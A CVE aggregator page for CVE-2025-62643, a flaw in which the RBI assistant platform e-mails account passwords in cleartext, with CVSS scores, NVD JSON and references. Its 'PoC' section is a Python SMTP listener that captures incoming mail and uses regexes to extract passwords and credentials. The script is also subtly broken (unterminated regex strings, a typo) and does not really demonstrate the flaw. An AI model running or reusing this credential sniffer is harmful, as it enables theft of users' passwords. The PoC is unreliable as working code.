Security Vulnerability Report
中文
CVE-2025-62643 CVSS 3.4 LOW

CVE-2025-62643

Published: 2025-10-17 21:15:37
Last Modified: 2025-10-31 18:32:49
Source: [email protected]

Description

The Restaurant Brands International (RBI) assistant platform through 2025-09-06 transmits passwords of user accounts in cleartext e-mail messages.

CVSS Details

CVSS Score
3.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:* - VULNERABLE
RBI助手平台 <= 2025-09-06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62643 PoC - RBI Assistant Platform Cleartext Password Exposure # This PoC demonstrates the vulnerability by intercepting cleartext passwords # transmitted via email by the RBI assistant platform. import smtpd import asyncore import email import re class CleartextPasswordSniffer(smtpd.SMTPServer): """ SMTP server simulator that intercepts emails containing cleartext passwords sent by the RBI assistant platform. """ def process_message(self, peer, mailfrom, rcpttos, data, **kwargs): print(f"[*] Intercepted email from: {mailfrom}") print(f"[*] Recipient(s): {rcpttos}") # Parse the email content msg = email.message_from_bytes(data) subject = msg.get('Subject', '') print(f"[*] Subject: {subject}") # Extract email body if msg.is_multipart(): for part in msg.walk(): content_type = part.get_content_type() if content_type == "text/plain" or content_type == "text/html": body = part.get_payload(decode=True).decode('utf-8', errors='ignore') self.extract_credentials(body) else: body = msg.get_payload(decode=True).decode('utf-8', errors='ignore') self.extract_credentials(body) def extract_credentials(self, body): """Extract cleartext passwords from email body using regex patterns.""" # Common patterns for password disclosure in emails patterns = [ r'password[:\s]+([A-Za-z0-9!@#$%^&*()_+={}\[\]:";'\"<>?,./~`-]{6,50})', r'Password[:\s]+([A-Za-z0-9!@#$%^&*()_+={}\[\]:";'\"<>?,./~`-]{6,50})', r'Your password is[:\s]+([A-Za-z0-9!@#$%^&*()_+={}\[\]:";'\"<>?,./~`-]{6,50})', r'pwd=([A-Za-z0-9!@#$%^&*()_+={}\[\]:";'\"<>?,./~`-]{6,50})', r'credentials[:\s]+(\w+:\w+)', ] for pattern in patterns: matches = re.findall(pattern, body, re.IGNORECASE) for match in matches: print(f"[!] CLEAREXT PASSWORD FOUND: {match}") # Start the SMTP sniffer on port 25 if __name__ == "__main__": print("[*] Starting SMTP sniffer for CVE-2025-62643...") print("[*] Listening on 0.0.0.0:25") server = CleartextPasswordSniffer(('0.0.0.0', 25), None) try: asyncore.loop() except KeyboardInterrupt: print("\n[*] Sniffer stopped.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62643", "sourceIdentifier": "[email protected]", "published": "2025-10-17T21:15:37.140", "lastModified": "2025-10-31T18:32:49.093", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Restaurant Brands International (RBI) assistant platform through 2025-09-06 transmits passwords of user accounts in cleartext e-mail messages."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rbi:restaurant_brands_international_assistant:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-09-06", "matchCriteriaId": "706D04A1-2EDB-4713-BA47-EFDC8A86FBA3"}]}]}], "references": [{"url": "https://archive.today/fMYQp", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://bobdahacker.com/blog/rbi-hacked-drive-thrus/", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://web.archive.org/web/20250906134240/https:/bobdahacker.com/blog/rbi-hacked-drive-thrus", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.malwarebytes.com/blog/news/2025/09/popeyes-tim-hortons-burger-king-platforms-have-catastrophic-vulnerabilities-say-hackers", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.yahoo.com/news/articles/burger-king-hacked-attackers-impressed-124154038.html", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.